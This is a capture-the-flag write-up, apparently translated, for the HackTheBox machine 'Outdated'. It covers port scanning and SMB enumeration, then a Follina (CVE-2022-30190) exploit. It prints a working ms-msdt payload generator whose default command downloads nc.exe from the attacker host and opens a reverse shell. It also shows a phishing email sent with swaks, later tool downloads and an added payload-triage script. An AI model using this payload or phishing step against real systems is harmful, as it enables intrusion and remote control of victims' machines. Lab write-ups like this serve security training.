Outdated-htb-writeup

0x00 Skills covered by this box

Skills in this chapter: anonymous FTP access, CVE-2022-30190, swaks, SharpHound.exe, impacket-smbserver, Whisker, Rubeus.exe, asktgt, WSUS, SharpWSUS.exe, PsExec64.exe

Reference: https://0xdf.gitlab.io/2022/12/10/htb-outdated.html

0x01 Getting user access

1. Box introduction

Outdated is a medium-difficulty Linux machine whose foothold is based on the 2022 "Follina" CVE. The box further contains an Active Directory scenario in which we must pivot from a domain user to the domain controller, using a series of tools to exploit the AD configuration and adjacent edges to our advantage. The final step involves abusing Windows Server Update Services (WSUS) and its poor configuration to compromise the domain controller.

2. Scan for open ports

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- -Pn 10.10.11.175 --min-rate=10000
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-10 15:17 CST
Nmap scan report for 10.10.11.175
Host is up (0.20s latency).
Not shown: 65513 filtered tcp ports (no-response)
PORT STATE SERVICE
25/tcp open smtp
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
8530/tcp open unknown
8531/tcp open unknown
9389/tcp open adws
49667/tcp open unknown
49687/tcp open unknown
49688/tcp open unknown
49913/tcp open unknown
63320/tcp open unknown
63353/tcp open unknown

Nmap done: 1 IP address (1 host up) scanned in 28.17 seconds

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -sC -sV -Pn 10.10.11.175 --min-rate=10000 -p25,53,88,135,139,389,445,464,593,636,3269,5985,8530,8531,9389,49667,49687,49688,49913,63320,63353
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-10 15:20 CST
Nmap scan report for 10.10.11.175
Host is up (0.26s latency).

PORT STATE SERVICE VERSION
25/tcp filtered smtp
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-10-10 15:08:50Z)
135/tcp filtered msrpc
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-10-10T15:10:23+00:00; +7h48m26s from scanner time.
| ssl-cert: Subject: commonName=DC.outdated.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.outdated.htb
| Not valid before: 2023-12-13T00:17:36
|_Not valid after: 2024-12-12T00:17:36
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp filtered ldapssl
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: outdated.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-10-10T15:10:24+00:00; +7h48m26s from scanner time.
| ssl-cert: Subject: commonName=DC.outdated.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.outdated.htb
| Not valid before: 2023-12-13T00:17:36
|_Not valid after: 2024-12-12T00:17:36
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8530/tcp filtered unknown
8531/tcp filtered unknown
9389/tcp open mc-nmf .NET Message Framing
49667/tcp filtered unknown
49687/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49688/tcp open msrpc Microsoft Windows RPC
49913/tcp open msrpc Microsoft Windows RPC
63320/tcp filtered unknown
63353/tcp filtered unknown
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-10-10T15:09:42
|_ start_date: N/A
|_clock-skew: mean: 7h48m25s, deviation: 0s, median: 7h48m25s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 101.36 seconds

3. Port 53 is open, so let's check for a zone transfer vulnerability

┌──(kali㉿offsec)-[~/Desktop]
└─$ dig @10.10.11.175 outdated.htb any

; <<>> DiG 9.19.21-1-Debian <<>> @10.10.11.175 outdated.htb any
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 45883
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 5, AUTHORITY: 0, ADDITIONAL: 4

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;outdated.htb. IN ANY

;; ANSWER SECTION:
outdated.htb. 600 IN A 172.16.20.1
outdated.htb. 600 IN A 10.10.11.175
outdated.htb. 3600 IN NS dc.outdated.htb.
outdated.htb. 3600 IN SOA dc.outdated.htb. hostmaster.outdated.htb. 228 900 600 86400 3600
outdated.htb. 600 IN AAAA dead:beef::f0e8:43c9:447b:c336

;; ADDITIONAL SECTION:
dc.outdated.htb. 3600 IN A 10.10.11.175
dc.outdated.htb. 3600 IN A 172.16.20.1
dc.outdated.htb. 3600 IN AAAA dead:beef::f0e8:43c9:447b:c336

;; Query time: 116 msec
;; SERVER: 10.10.11.175#53(10.10.11.175) (TCP)
;; WHEN: Thu Oct 10 15:40:58 CST 2024
;; MSG SIZE rcvd: 225

4. Add the hosts entries locally

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.11.175 dc.outdated.htb hostmaster.outdated.htb outdated.htb" | sudo tee -a /etc/hosts
[sudo] kali 的密码:
10.10.11.175 dc.outdated.htb hostmaster.outdated.htb outdated.htb

5. Try enumerating the shares

┌──(kali㉿offsec)-[~/Desktop]
└─$ netexec smb 10.10.11.175 -u guest -p '' --shares
SMB 10.10.11.175 445 DC [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC) (domain:outdated.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.175 445 DC [+] outdated.htb\guest:
SMB 10.10.11.175 445 DC [*] Enumerated shares
SMB 10.10.11.175 445 DC Share Permissions Remark
SMB 10.10.11.175 445 DC ----- ----------- ------
SMB 10.10.11.175 445 DC ADMIN$ Remote Admin
SMB 10.10.11.175 445 DC C$ Default share
SMB 10.10.11.175 445 DC IPC$ READ Remote IPC
SMB 10.10.11.175 445 DC NETLOGON Logon server share
SMB 10.10.11.175 445 DC Shares READ
SMB 10.10.11.175 445 DC SYSVOL Logon server share
SMB 10.10.11.175 445 DC UpdateServicesPackages A network share to be used by client systems for collecting all software packages (usually applications) published on this WSUS system.
SMB 10.10.11.175 445 DC WsusContent A network share to be used by Local Publishing to place published content on this WSUS system.
SMB 10.10.11.175 445 DC WSUSTemp A network share used by Local Publishing from a Remote WSUS Console Instance.
┌──(kali㉿offsec)-[~/Desktop]
└─$ smbmap -H 10.10.11.175 -u 'guest' -p ''

________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)

[+] IP: 10.10.11.175:445 Name: dc.outdated.htb Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON NO ACCESS Logon server share
Shares READ ONLY
SYSVOL NO ACCESS Logon server share
UpdateServicesPackages NO ACCESS A network share to be used by client systems for collecting all software packages (usually applications) published on this WSUS system.
WsusContent NO ACCESS A network share to be used by Local Publishing to place published content on this WSUS system.
WSUSTemp NO ACCESS A network share used by Local Publishing from a Remote WSUS Console Instance.

6. That turned up something; let's look at the files in the readable share

┌──(kali㉿offsec)-[~/Desktop]
└─$ smbclient //10.10.11.175/Shares -N
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Jun 20 23:01:33 2022
.. D 0 Mon Jun 20 23:01:33 2022
NOC_Reminder.pdf AR 106977 Mon Jun 20 23:00:32 2022

9116415 blocks of size 4096. 1941803 blocks available
smb: \> get NOC_Reminder.pdf
getting file \NOC_Reminder.pdf of size 106977 as NOC_Reminder.pdf (101.6 KiloBytes/sec) (average 101.6 KiloBytes/sec)
smb: \> exit

7. A PDF file was found here; let's examine it

┌──(kali㉿offsec)-[~/Desktop]
└─$ exiftool NOC_Reminder.pdf
ExifTool Version Number : 12.76
File Name : NOC_Reminder.pdf
Directory : .
File Size : 107 kB
File Modification Date/Time : 2024:10:10 16:38:56+08:00
File Access Date/Time : 2024:10:10 16:38:57+08:00
File Inode Change Date/Time : 2024:10:10 16:38:56+08:00
File Permissions : -rw-r--r--
File Type : PDF
File Type Extension : pdf
MIME Type : application/pdf
PDF Version : 1.3
Linearized : No
Page Count : 1
Profile CMM Type : Linotronic
Profile Version : 2.1.0
Profile Class : Display Device Profile
Color Space Data : RGB
Profile Connection Space : XYZ
Profile Date Time : 1998:02:09 06:49:00
Profile File Signature : acsp
Primary Platform : Microsoft Corporation
CMM Flags : Not Embedded, Independent
Device Manufacturer : Hewlett-Packard
Device Model : sRGB
Device Attributes : Reflective, Glossy, Positive, Color
Rendering Intent : Perceptual
Connection Space Illuminant : 0.9642 1 0.82491
Profile Creator : Hewlett-Packard
Profile ID : 0
Profile Copyright : Copyright (c) 1998 Hewlett-Packard Company
Profile Description : sRGB IEC61966-2.1
Media White Point : 0.95045 1 1.08905
Media Black Point : 0 0 0
Red Matrix Column : 0.43607 0.22249 0.01392
Green Matrix Column : 0.38515 0.71687 0.09708
Blue Matrix Column : 0.14307 0.06061 0.7141
Device Mfg Desc : IEC http://www.iec.ch
Device Model Desc : IEC 61966-2.1 Default RGB colour space - sRGB
Viewing Cond Desc : Reference Viewing Condition in IEC61966-2.1
Viewing Cond Illuminant : 19.6445 20.3718 16.8089
Viewing Cond Surround : 3.92889 4.07439 3.36179
Viewing Cond Illuminant Type : D50
Luminance : 76.03647 80 87.12462
Measurement Observer : CIE 1931
Measurement Backing : 0 0 0
Measurement Geometry : Unknown
Measurement Flare : 0.999%
Measurement Illuminant : D65
Technology : Cathode Ray Tube Display
Red Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
Green Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
Blue Tone Reproduction Curve : (Binary data 2060 bytes, use -b option to extract)
Producer : macOS Version 10.15.7 (Build 19H1922) Quartz PDFContext
Creator : Word
Create Date : 2022:06:20 15:00:32Z
Modify Date : 2022:06:20 15:00:32Z

8. Translation and analysis

Due to the security breach last week, we need to rebuild some of our core servers. This has impacted some of our workstations, update services, monitoring tools and backups. While we rebuild, please email links to any internal web applications to itsupport@outdated.htb so we can add them back into our monitoring platform for alerting and notification. We have also arranged for a new SOC employee to help with this and to accelerate restoring our update services, to make sure all critical vulnerabilities are patched and servers are up to date. The CVE list below is the top priority and we must make sure these are patched as soon as possible. Thanks in advance for your help. If you have any questions, please contact the mailing list above.

9. Now combine that with the vulnerability and send the exploit to the target; first, some reference articles

CVE-2022-30190

https://www.cnblogs.com/zhibing/p/16893827.html

https://github.com/doocop/CVE-2022-30190

I'll send an email to the address noted in the document, itsupport@outdated.htb, containing a link to the Follina exploit. Typically Follina is packaged in a Word document, mainly to avoid popups and similar issues. To solve Outdated, I only need an HTML page that uses JavaScript to redirect to an msdt:// URL.

10. Generate the payload

#!/usr/bin/env python3

import base64
import random
import string
import sys

if len(sys.argv) > 1:
    command = sys.argv[1]
else:
    command = "IWR http://10.10.16.7/nc.exe -outfile C:\\programdata\\nc.exe; C:\\programdata\\nc.exe 10.10.16.7 443 -e cmd"

base64_payload = base64.b64encode(command.encode("utf-8")).decode("utf-8")

# Slap together a unique MS-MSDT payload that is over 4096 bytes at minimum
html_payload = f"""<script>location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \\"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'{base64_payload}'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\\""; //"""
html_payload += (
    "".join([random.choice(string.ascii_lowercase) for _ in range(4096)])
    + "\n</script>"
)

print(html_payload)
┌──(kali㉿offsec)-[~/Desktop]
└─$ python3 exp.py
<script>location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'SVdSIGh0dHA6Ly8xMC4xMC4xNi43L25jLmV4ZSAtb3V0ZmlsZSBDOlxwcm9ncmFtZGF0YVxuYy5leGU7IEM6XHByb2dyYW1kYXRhXG5jLmV4ZSAxMC4xMC4xNi43IDQ0MyAtZSBjbWQ='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe\""; //rilehusgxhxlqviyxkjxyvkvgmcwdobycrwetonistelgwswjngdmcelwfbpixayvlbclhvrusfpdcpjstszkkqyoefvnipjbdhdvpstqwfsmadsxzmdstucueugszimjtnnyatepdhzwygpujdgvbjhqsttdzheydpjygvxjsxvtnpesmrjbruvvkwcayqkozceijqnwrbhibpleklbapsklahrhedeipfdvbuuvkvuhrdxznakoleoixbdbblssawlrxmlfztxekwdoriknkgoqeejkyqhokwariepjgbyphxlpbnbbeoahwleeeifpazodyoquxfzvuophwlgdcvdvkbxsmiyljyxjchwupomlkyhdmjtivrhmqqifnokcjypezugzdrpsbxqwcxpwztccxvgzoolcraqeyiwyelcvhxugbglqknwugsunfhasdkolofvdcethpahqeudnjnyzpbdexaseojouuaycliifiptxnpbfzyhyesymosxouohgubdfwcmeyqgeycwmcmdbqalfylkqqxocgyfohaqtrhzlbqtttrwoiotogrvraejhjmuhaaevobatcznokeptjkyxozfarkckvnvubzibsbtrlkqulvcbsgbvozluxixaojdjstdwvblvdiviijdcjdcqzxexdspoahtjdjgxmmkijkijlvsaprxfohfveqzujiqfylvsilknwhnwyfeheopjsttckpmooltstspzufvflqkfgtqyefabdpuatyaerxxgeubqbvwnfenkgeaektpuxsuwrqzftsvguszxiylebyhizqbgxppuaglrcsbodsrqwgiflsxvrihamwxudlmsstkmfckrioezpbpcludwvepkjgfdhklorcpacatbojjsodixpzxqpadxerdiidhjeqsufzgtcyqjtuodqmhjbueilvuugwdnyqlqoiyvhyrhrdnbgtjsmxixmlimtgepaatpeaiicsgorlnpgewepcxfztyljhduftkkegkuiiwsxrhcmypjbzgvrpkcqafuaimqhtmahfmunsqncvplipoqwlvlxwboupyeatgggczhichjrmbxugkgtbgziadsqsuwasbssbexectbxvqrtlcmpzbwkdhgvqvjvamsksdfeyeycrntgxmvvstcawvvucuqhnqcmjdpopbfgdbahsekyujgfjtpjfxlyloyvchqomaazqfkzvcchmcokeospjwfpymtohprznetwmditatysbxfetxdihfnbegpcijhprimklsmndhqrnjqtlasnzmvehfgizuotdcvfnwnaidqmxbbxqehsnqufioqhmrgnkajznlgyxnjyclrfemkiyvosvzqadcpqjqrmzxhbswtetpuvvnlcopwgwweedjyxvkrztwkhcxjusnzasqokeevggmtlamofyzzcqmy
piclhzvufuvhayhsfrvcfxuwnqisdprrifirsulaqknserjnjlzflmdvqczkdcmpobhmsziwsfjbyprvksimepaqvrsrpnetwavtxusjxokadozkxvarrsvpwsdlevxztcpegtdocureyrcxqeuquagkadgolkrzclllskrzcccxnqatmtsiyoaotljoyzvtlfgdsbinyzlerzevcsqidatafoyjeaxibpzlkfathukntcyfkzrlpywltrjkijvhaissdpbdjaislusuwklhjtxrooditjctatfmohycybtujqdkhuhebdsuccftvrxyjmruglacekrctjbyzmosmdxagmpgkgpqntwfexukmkwicxbkauxgqvimiinjkhmlbpmlajnsqegysqhtrvjisndxxybjupulwobbyaqayeckuypitgvbyptxcbnyacfvmofvfujofdcnbdhwcsrqjqtyscsfxfuagfoeuitfjhmnieucauaantdthaxzgdeyrosxfsidolaignpepbuosulhckjkuntgmwlkfopewxkswchxqrkcczowhsstdukrygozsnlzitddgxyyejddzklinxznoacrbrvpvgkcrptzebljknaiivutptlfpfeusdphvbecvmsjhcgcvailzdqlyjeumymnkwqtajklvfricburcdleleitiwzngnewmpjichhygcpdhwfmustxzowmitikqgblknirhvrwxsihqvbumalocaudgxhfzdeybwhentyeosyprzktwnalcxpqdfjkqawutbjsejrhrqgsukatdutbnfzcchiegofdzvgiqjhvpfwidzmdmbuuasmmcdjkwwwgbrgxstmzsltrgyhhvgxckwrsypjhudmvdviovrgicudbficxhyhsvrpfomobwkhyxabmhkzcvbnnvyrdllndnbzabbtcmnbrmgqrhlvfsdwmgkcbuvpavtqpcmpbdwvprqpbhpocqzgplihlsveqbwtwojwufnjittywmkclmymizjqjyieqdgfvztjqfydqlzpaqzsitdelvyphszjpzeitnsqfnkkhctodbcdsqoazkdwnctvbbhktfuaolyenyyxtkwcrjqdpedklqgrhxoryabejupntcpymmlchffdgwyulebcwtakdknbwyakwmqtboxfmejusnkwxlxnnkmbfazfgtqnishldiindrhtdzxuusszdricbzlvmpwttwsoyubeybhhhfjakxmjmmvefgndebpiscpeotogymixfckhgthpbhnbeplrnagvducgwudmxlcyarvdfwuupoeexljfbtrtpddrcmbbfroyytpjqaszvdlgxvjfosyzizkzmuokrsbyojqklsebstiaffzbvmnlthibdculpsgapyijpzjhstvqgpfhldezpnlpeejatuqzekaakvnrmfuxyariwioiawrbalgrnbubzevhtyxqndiwwxsskhjpbpaqlmlqvhloneqslcfzbghrjgwyquzwxdoeewrjeppgwwqcrdomfiqfledjqyamsktlhdysvhmjlbcnetnekscjorkhidfhtatfzbsffovuvoqjfhhdfeqpwkvbawwjezuiszurjapurvbmxfwjavodssvxraslhlnvcfsookjxjctprqozpfgtbbsthumysjgvxmvugfluxjsdnavlrgyhwbcfcqfdflmjweerfqzhnggljdzkxragdvdruabvhbzrrsueopzeudgioyhvlirejatudybvuvuxlqujvjqmcegnlqybortotyzikllenqgjelwnwjsooravlidfironkdtgwzpowtklgxbagozpjjeaobchhrwlnhltxqlcquxnrmunjjtdwholeqmdndtfffdxuizizdkeqrcbrkobshceuwatvnzdslqhnskyyuilriwcuteejrjvhkuiqkxwoofazkeovvbrjhocpszjyrhek
jptthvltmsxtrdtjwrkscwoczzjduxwnmacknpfjjeovkdwwwlybaorluzoynkgcsbphqjzkcfcloixalbtpwlhvqruxkogaaesxauhddvysqfsptdnyxanxardnpsdfupmluxlcbgmhxxrbllwbguskcrljxinrfbwyzizwymlnjidohuowbcimgetkpvuihogicyurqyxvuzesbkosxdpeoafnsudqarocrftalvaknniooxvhpzxjctvshkelpdhdcwcsklplemugcwnttxgstupkbopbpcnovxaegijzkljgscjwovddmerttnnlhbshwyxxckvxjquolhnxycmolxiykhwixymnugvqlrdqomgnybfdxawgwbyjrbeophyvccztqdbdjvukkgnactnskuejalyklvzmvdeqqiplalevvvkbwgtwokdswnilhqmggyukyufaswdryiogwtliccvntrllxeccprmbhidordtksyzjkmlsydatcffiowynbqeuaniqqybpfpvtsocppxgqbpkrcpzoejskwzimydjwqfkmextymesvmupqpojahpaoqccbgpdqnqmkddmoswltlkryxjdlhgdzyqctmtkppiggjqehliczjzg
</script>

11. Save the generated JS code to msdt.html.

12. I'll email the link to itsupport@outdated.htb using swaks:

┌──(kali㉿offsec)-[~/Desktop]
└─$ swaks --to itsupport@outdated.htb --from "shiyan@qq.com" --header "Subject: Internal web app" --body "http://10.10.16.7/msdt.html"
=== Trying outdated.htb:25...
=== Connected to outdated.htb.
<- 220 mail.outdated.htb ESMTP
-> EHLO offsec
<- 250-mail.outdated.htb
<- 250-SIZE 20480000
<- 250-AUTH LOGIN
<- 250 HELP
-> MAIL FROM:<shiyan@qq.com>
<- 250 OK
-> RCPT TO:<itsupport@outdated.htb>
<- 250 OK
-> DATA
<- 354 OK, send.
-> Date: Thu, 10 Oct 2024 16:53:45 +0800
-> To: itsupport@outdated.htb
-> From: shiyan@qq.com
-> Subject: Internal web app
-> Message-Id: <20241010165345.055704@offsec>
-> X-Mailer: swaks v20240103.0 jetmore.org/john/code/swaks/
->
-> http://10.10.16.7/msdt.html
->
->
-> .
<- 250 Queued (10.485 seconds)
-> QUIT
<- 221 goodbye
=== Connection closed with remote host.


┌──(kali㉿offsec)-[~/Desktop]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.11.175 - - [10/Oct/2024 16:54:22] "GET /msdt.html HTTP/1.1" 200 -
10.10.11.175 - - [10/Oct/2024 16:54:23] "GET /nc.exe HTTP/1.1" 200 -
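A defender-side triage helper for pages like the msdt.html generated above, added here as an example (not code from the original writeup): it extracts the ms-msdt: URL, collapses the [char] string joins, and decodes the FromBase64String argument so the embedded command can be read without opening the page. The sample HTML and its placeholder command are constructed.

```python
#!/usr/bin/env python3
"""Static triage for HTML that invokes the ms-msdt: handler (CVE-2022-30190).

Added example; not code from the writeup. Finds ms-msdt: URLs in a page,
collapses the '+[char]NN+' joins that hide "::" and quotes in the PowerShell
carried by IT_BrowseForFile, and decodes the FromBase64String(...) argument so
the embedded command can be read without executing anything.
"""
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional

# From "ms-msdt:" up to the first unescaped double quote of the JS string.
MSDT_URL_RE = re.compile(r'(?i)ms-msdt:(?:[^"\\]|\\.)*')
# 'a'+[char]58+[char]58+'b'  ->  a::b
CHAR_JOIN_RE = re.compile(r"'((?:\+\[char\]\d+)+)\+'")
B64_ARG_RE = re.compile(r"FromBase64String\(([^)]*)\)")
B64_BLOB_RE = re.compile(r"[A-Za-z0-9+/]{8,}={0,2}")
TRAVERSAL_RE = re.compile(r'((?:\.\./)+[^"\s]*)')

PLACEHOLDER_COMMAND = "Write-Output 'inert placeholder'"   # constructed, harmless
_B64 = base64.b64encode(PLACEHOLDER_COMMAND.encode()).decode()

# Constructed sample in the shape of the generator output above: the [char]
# joins, the ../ traversal to mpsigstub.exe and the 4096-byte padding.
SAMPLE_HTML = (
    '<script>location.href = "ms-msdt:/id PCWDiagnostic /skip force /param '
    '\\"IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$('
    "Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+"
    "[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+"
    "'FromBase64String('+[char]34+'" + _B64 + "'+[char]34+'))'))))i/../../../"
    '../Windows/System32/mpsigstub.exe\\""; //' + "a" * 4096 + "\n</script>"
)


@dataclass
class MsdtFinding:
    url: str                          # deobfuscated ms-msdt: URL
    diag_pack: Optional[str]          # troubleshooting pack named by /id
    skip_force: bool                  # /skip force suppresses the dialog
    traversal_target: Optional[str]   # executable reached via ../ traversal
    decoded_commands: List[str] = field(default_factory=list)


def deobfuscate_char_joins(text: str) -> str:
    """Replace '+[char]N+[char]M+' joins with the characters they build."""
    return CHAR_JOIN_RE.sub(
        lambda m: "".join(chr(int(n)) for n in re.findall(r"\d+", m.group(1))),
        text)


def decode_base64_args(text: str) -> List[str]:
    """Return the printable strings hidden in FromBase64String(...) arguments."""
    found: List[str] = []
    for arg in B64_ARG_RE.findall(text):
        for blob in B64_BLOB_RE.findall(arg):
            try:
                decoded = base64.b64decode(blob, validate=True).decode("utf-8")
            except (ValueError, UnicodeDecodeError):
                continue
            if decoded.isprintable():
                found.append(decoded)
    return found


def triage_html(html: str) -> List[MsdtFinding]:
    """Describe every ms-msdt: invocation found in the page."""
    findings: List[MsdtFinding] = []
    for m in MSDT_URL_RE.finditer(html):
        url = deobfuscate_char_joins(m.group(0).replace('\\"', '"'))
        diag = re.search(r"/id\s+(\S+)", url)
        trav = TRAVERSAL_RE.search(url)
        target = None
        if trav:
            exe = re.search(r"([\w.-]+\.exe)", trav.group(1), re.I)
            target = exe.group(1) if exe else trav.group(1)
        findings.append(MsdtFinding(
            url=url,
            diag_pack=diag.group(1) if diag else None,
            skip_force=re.search(r"/skip\s+force", url, re.I) is not None,
            traversal_target=target,
            decoded_commands=decode_base64_args(url),
        ))
    return findings


if __name__ == "__main__":
    for f in triage_html(SAMPLE_HTML):
        print(f"pack={f.diag_pack} skip_force={f.skip_force} "
              f"traversal={f.traversal_target} commands={f.decoded_commands}")
```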

13. Got the initial shell

┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.175] 49829
Microsoft Windows [Version 10.0.19043.928]
(c) Microsoft Corporation. All rights reserved.

C:\Users\btables\AppData\Local\Temp\SDIAG_c46ad4a5-222a-455b-8c73-8b7950730864>whoami
whoami
outdated\btables

C:\Users\btables\AppData\Local\Temp\SDIAG_c46ad4a5-222a-455b-8c73-8b7950730864>

14. Analysis shows the current host is in a domain environment

C:\Users\btables\Desktop>systeminfo
systeminfo

Host Name: CLIENT
OS Name: Microsoft Windows 10 Enterprise N
OS Version: 10.0.19043 N/A Build 19043
OS Manufacturer: Microsoft Corporation
OS Configuration: Member Workstation
OS Build Type: Multiprocessor Free
Registered Owner: setup
Registered Organization:
Product ID: 00330-00182-51735-AA058
Original Install Date: 6/15/2022, 8:20:38 AM
System Boot Time: 10/10/2024, 6:53:06 AM
System Manufacturer: Microsoft Corporation
System Model: Virtual Machine
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 25 Model 1 Stepping 1 AuthenticAMD ~2994 Mhz
BIOS Version: American Megatrends Inc. 090007 , 5/18/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory: 1,506 MB
Available Physical Memory: 495 MB
Virtual Memory: Max Size: 2,146 MB
Virtual Memory: Available: 892 MB
Virtual Memory: In Use: 1,254 MB
Page File Location(s): C:\pagefile.sys
Domain: outdated.htb
Logon Server: \\DC
Hotfix(s): 4 Hotfix(s) Installed.
[01]: KB4601554
[02]: KB5000736
[03]: KB5001330
[04]: KB5001405
Network Card(s): 1 NIC(s) Installed.
[01]: Microsoft Hyper-V Network Adapter
Connection Name: Ethernet
DHCP Enabled: No
IP address(es)
[01]: 172.16.20.20
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.

C:\Users\btables\Desktop>
C:\Users\btables\Desktop>net time /domain
net time /domain
Current time at \\DC.outdated.htb is 10/10/2024 8:49:42 AM

The command completed successfully.


C:\Users\btables\Desktop>

15. Since it's a domain, upload a domain enumeration tool

C:\Users\btables\Desktop>powershell
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\Users\btables\Desktop> iwr http://10.10.16.7/SharpHound.exe -outfile s.exe
iwr http://10.10.16.7/SharpHound.exe -outfile s.exe
PS C:\Users\btables\Desktop>


PS C:\Users\btables\Desktop> dir
dir


Directory: C:\Users\btables\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/10/2024 8:51 AM 1046528 s.exe


PS C:\Users\btables\Desktop>

16. Run the collection

PS C:\Users\btables\Desktop> .\s.exe -C all
.\s.exe -C all
2024-10-10T08:52:36.6661803-07:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound
2024-10-10T08:52:36.7911805-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-10-10T08:52:36.8068052-07:00|INFORMATION|Initializing SharpHound at 8:52 AM on 10/10/2024
2024-10-10T08:52:37.0317513-07:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for outdated.htb : DC.outdated.htb
2024-10-10T08:52:37.2036286-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-10-10T08:52:37.3986303-07:00|INFORMATION|Beginning LDAP search for outdated.htb
2024-10-10T08:52:37.4299223-07:00|INFORMATION|Producer has finished, closing LDAP channel
2024-10-10T08:52:37.4299223-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2024-10-10T08:53:07.4824678-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 36 MB RAM
2024-10-10T08:53:24.2608866-07:00|INFORMATION|Consumers finished, closing output channel
2024-10-10T08:53:24.2921599-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2024-10-10T08:53:24.3546400-07:00|INFORMATION|Status: 97 objects finished (+97 2.108696)/s -- Using 44 MB RAM
2024-10-10T08:53:24.3546400-07:00|INFORMATION|Enumeration finished in 00:00:46.9558203
2024-10-10T08:53:24.4171382-07:00|INFORMATION|Saving cache with stats: 56 ID to type mappings.
57 name to SID mappings.
1 machine sid mappings.
